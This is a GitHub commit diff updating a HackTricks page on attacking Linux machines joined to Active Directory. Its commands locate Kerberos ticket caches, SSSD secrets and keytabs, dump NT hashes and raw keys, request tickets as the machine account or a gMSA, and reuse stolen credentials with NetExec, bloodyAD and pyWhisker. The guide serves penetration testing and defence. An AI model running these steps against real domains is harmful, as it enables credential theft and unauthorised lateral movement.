Skip to content

Commit 1643351

Browse files
authored
Merge pull request #2456 from HackTricks-wiki/research_update_src_linux-hardening_privilege-escalation_linux-active-directory_20260702_040204
Research Update Enhanced src/linux-hardening/privilege-escal...
2 parents 1df2dc5 + ddf7e39 commit 1643351

1 file changed

Lines changed: 122 additions & 20 deletions

File tree

src/linux-hardening/privilege-escalation/linux-active-directory.md

Lines changed: 122 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@
44

55
A linux machine can also be present inside an Active Directory environment.
66

7-
A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root** inside the machine.
7+
A Linux machine inside an AD can **store Kerberos material locally**: user ccaches, machine/service keytabs, and SSSD-managed secrets. These artefacts can usually be reused as any other Kerberos credential. In order to read most of them you will need to be the user owner of the ticket or **root** on the machine.
88

99
## Enumeration
1010

@@ -28,6 +28,27 @@ FreeIPA is an open-source **alternative** to Microsoft Windows **Active Director
2828
../freeipa-pentesting.md
2929
{{#endref}}
3030

31+
### Domain-joined host artefacts
32+
33+
Before touching tickets, identify **how the host was joined to AD** and **where Kerberos material is really stored**. On modern Linux hosts this is commonly handled by `realmd` + `adcli` + `sssd`, not just flat files in `/tmp`:
34+
35+
```bash
36+
# Is the host joined to a realm/domain?
37+
realm list 2>/dev/null
38+
adcli testjoin 2>/dev/null
39+
40+
# SSSD / Kerberos configuration
41+
grep -R "ad_domain\|krb5_realm\|cache_credentials\|ldap_id_mapping" /etc/sssd/sssd.conf /etc/sssd/conf.d 2>/dev/null
42+
grep -R "default_ccache_name" /etc/krb5.conf /etc/krb5.conf.d 2>/dev/null
43+
44+
# Machine account and local Kerberos artefacts
45+
klist -k /etc/krb5.keytab 2>/dev/null
46+
find /var/lib/sss -maxdepth 3 \( -name '*.ldb' -o -name '.secrets.mkey' -o -name 'ccache_*' \) -ls 2>/dev/null
47+
find /tmp /run/user -maxdepth 2 -name 'krb5cc*' -ls 2>/dev/null
48+
```
49+
50+
This quickly tells you whether the host trusts AD, whether SSSD is caching identities or tickets, and whether **machine/service keytabs** or **KCM secrets** are available for abuse.
51+
3152
## Playing with tickets
3253

3354
### Pass The Ticket
@@ -39,19 +60,28 @@ In this page you are going to find different places were you could **find kerber
3960
../../windows-hardening/active-directory-methodology/pass-the-ticket.md
4061
{{#endref}}
4162

42-
### CCACHE ticket reuse from /tmp
63+
If you want the **Linux-specific ticket harvesting workflows** (`FILE`, `DIR`, `KEYRING`, `KCM`, `/proc`, etc.), check the dedicated page:
4364

44-
CCACHE files are binary formats for **storing Kerberos credentials** are typically stored with 600 permissions in `/tmp`. These files can be identified by their **name format, `krb5cc_%{uid}`,** correlating to the user's UID. For authentication ticket verification, the **environment variable `KRB5CCNAME`** should be set to the path of the desired ticket file, enabling its reuse.
65+
{{#ref}}
66+
../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md
67+
{{#endref}}
68+
69+
### CCACHE ticket reuse from /tmp
4570

46-
List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be **reused by setting the environment variable** with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID.
71+
CCACHE files are binary formats for **storing Kerberos credentials**. `FILE:/tmp/krb5cc_%{uid}` is still common, but modern Linux deployments also use `DIR:/run/user/%{uid}/krb5cc*`, `KEYRING:persistent:%{uid}`, or `KCM:%{uid}`. Check the **`KRB5CCNAME`** environment variable and the `default_ccache_name` setting before assuming tickets live in `/tmp`.
4772

4873
```bash
49-
# Find tickets
50-
ls /tmp/ | grep krb5cc
51-
krb5cc_1000
74+
# Where is the current process reading credentials from?
75+
env | grep KRB5CCNAME
76+
grep -R "default_ccache_name" /etc/krb5.conf /etc/krb5.conf.d 2>/dev/null
77+
klist -l 2>/dev/null
78+
79+
# FILE / DIR caches commonly seen on joined Linux hosts
80+
find /tmp /run/user -maxdepth 2 -name 'krb5cc*' -ls 2>/dev/null
5281

53-
# Prepare to use it
82+
# Prepare to reuse a FILE cache
5483
export KRB5CCNAME=/tmp/krb5cc_1000
84+
klist
5585
```
5686

5787
### CCACHE ticket reuse from keyring
@@ -82,26 +112,29 @@ python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
82112

83113
The **credential cache Kerberos blob can be converted into a usable Kerberos CCache** file that can be passed to Mimikatz/Rubeus.
84114

85-
### CCACHE ticket reuse from keytab
115+
### Quick keytab triage
86116

87117
```bash
88-
git clone https://github.com/its-a-feature/KeytabParser
89-
python KeytabParser.py /etc/krb5.keytab
90-
klist -k /etc/krb5.keytab
118+
# Inspect available principals and enctypes
119+
klist -k -e /etc/krb5.keytab
120+
121+
# Request a TGT directly from the keytab
122+
kinit -k -t /etc/krb5.keytab 'host/web01.domain.local@DOMAIN.LOCAL'
123+
klist
91124
```
92125

93126
### Extract accounts from /etc/krb5.keytab
94127

95128
Service account keys, essential for services operating with root privileges, are securely stored in **`/etc/krb5.keytab`** files. These keys, akin to passwords for services, demand strict confidentiality.
96129

97-
To inspect the keytab file's contents, **`klist`** can be employed. The tool is designed to display key details, including the **NT Hash** for user authentication, particularly when the key type is identified as 23.
130+
To inspect the keytab file's contents, **`klist`** can be employed. On Linux, `klist -k -K -e` prints the principals, key version numbers, encryption types, and raw key material. If the key type is **23 / RC4-HMAC**, the key value is also the **NT hash** of that principal.
98131

99132
```bash
100-
klist.exe -t -K -e -k FILE:C:/Path/to/your/krb5.keytab
101-
# Output includes service principal details and the NT Hash
133+
klist -k -K -e /etc/krb5.keytab
134+
# RC4-HMAC entries expose reusable NTLM material; AES entries do not
102135
```
103136

104-
For Linux users, **`KeyTabExtract`** offers functionality to extract the RC4 HMAC hash, which can be leveraged for NTLM hash reuse.
137+
For Linux users, **`KeyTabExtract`** offers functionality to extract the RC4 HMAC hash, which can be leveraged for NTLM hash reuse. Note that this only helps when the keytab still contains **etype 23 / RC4-HMAC** material. In **AES-only** environments you may not get a reusable NT hash, but you can still authenticate directly with the keytab via Kerberos.
105138

106139
```bash
107140
python3 keytabextract.py krb5.keytab
@@ -114,17 +147,86 @@ On macOS, **`bifrost`** serves as a tool for keytab file analysis.
114147
./bifrost -action dump -source keytab -path /path/to/your/file
115148
```
116149

117-
Utilizing the extracted account and hash information, connections to servers can be established using tools like **`crackmapexec`**.
150+
Utilizing the extracted account and hash information, connections to servers can be established using tools like **`NetExec`**.
151+
152+
```bash
153+
# NTLM/RC4 material recovered from etype 23 entries
154+
nxc smb 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDOMAIN"
155+
156+
# Or reuse a Kerberos cache directly
157+
KRB5CCNAME=owned.ccache netexec smb <DC_FQDN> --use-kcache
158+
```
159+
160+
### Reuse the machine account from `/etc/krb5.keytab`
161+
162+
On `realmd`/`adcli`/`sssd` joined systems, `/etc/krb5.keytab` usually contains the **computer account** and one or more **host/service principals**. If you have **root**, don't just dump it: use one of the principals listed by `klist -k` to request a TGT and operate as the Linux host itself.
118163

119164
```bash
120-
crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDOMAIN"
165+
# Identify usable principals first
166+
klist -k /etc/krb5.keytab
167+
168+
# Then request a TGT with one of the listed principals
169+
kinit -k -t /etc/krb5.keytab 'host/web01.domain.local@DOMAIN.LOCAL'
170+
klist
171+
172+
# Validate LDAP / service access using that machine identity
173+
ldapwhoami -Y GSSAPI -H ldap://dc.domain.local
174+
kvno ldap/dc.domain.local
121175
```
122176

177+
This is especially useful when the **computer object** itself has delegated rights in AD or when the host is allowed to retrieve other secrets such as a **gMSA**.
178+
179+
### Reuse stolen Kerberos material with Linux-first AD tooling
180+
181+
Once you have a valid `ccache` or a usable keytab, you can operate against AD **directly from Linux** without converting everything to Windows formats first. Many modern tools accept `KRB5CCNAME` / Kerberos auth natively:
182+
183+
```bash
184+
# Reuse a stolen cache with bloodyAD for LDAP-side actions
185+
KRB5CCNAME=owned.ccache bloodyAD -d corp.local -k --host dc.corp.local get object 'CN=Domain Admins,CN=Users,DC=corp,DC=local'
186+
187+
# Reuse the same cache with pyWhisker when you already have write access
188+
KRB5CCNAME=owned.ccache python3 pywhisker.py -d corp.local -k --dc-ip dc.corp.local \
189+
--target 'WEB01$' --action list
190+
```
191+
192+
This is a good bridge between **Linux post-exploitation** and **AD object abuse**. For the object-level abuse paths themselves, check:
193+
194+
{{#ref}}
195+
../../network-services-pentesting/pentesting-ldap.md
196+
{{#endref}}
197+
198+
{{#ref}}
199+
../../windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
200+
{{#endref}}
201+
202+
### Linux gMSA / Managed Service Account artefacts
203+
204+
Recent Linux deployments can consume **Managed Service Accounts** directly from AD. In practice this means that, after compromising a Linux server, you may find not only the host keytab but also **service-specific keytabs** generated from a gMSA. Common places to inspect are `/etc/gmsad.conf`, deployment-specific config files, and additional `*.keytab` files under `/etc`.
205+
206+
```bash
207+
# Look for gMSA-related configuration and extra keytabs
208+
grep -R "gMSA_\|principal =\|keytab =" /etc/gmsad.conf /etc/gmsad.d 2>/dev/null
209+
find /etc -maxdepth 2 -name '*.keytab' -ls 2>/dev/null
210+
211+
# Inspect the host keytab and any service keytab you find
212+
klist -kt /etc/krb5.keytab
213+
klist -kt /etc/service.keytab
214+
215+
# If a service/gMSA keytab exists, request a TGT with it
216+
kinit -kt /etc/service.keytab 'svc_web$@DOMAIN.LOCAL'
217+
klist
218+
```
219+
220+
This gives you a reusable Kerberos identity for the SPNs bound to that gMSA **without touching any Windows endpoint**. For **domain-side** gMSA/dMSA abuse after higher privileges in AD, check:
221+
222+
{{#ref}}
223+
../../windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md
224+
{{#endref}}
225+
123226
## References
124227

125228
- [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
126-
- [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey)
127-
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory)
229+
- [https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/integrating_rhel_systems_directly_with_windows_active_directory/assembly_accessing-ad-with-a-managed-service-account_integrating-rhel-systems-directly-with-active-directory](https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/integrating_rhel_systems_directly_with_windows_active_directory/assembly_accessing-ad-with-a-managed-service-account_integrating-rhel-systems-directly-with-active-directory)
128230

129231
{{#include ../../banners/hacktricks-training.md}}
130232

0 commit comments

Comments
 (0)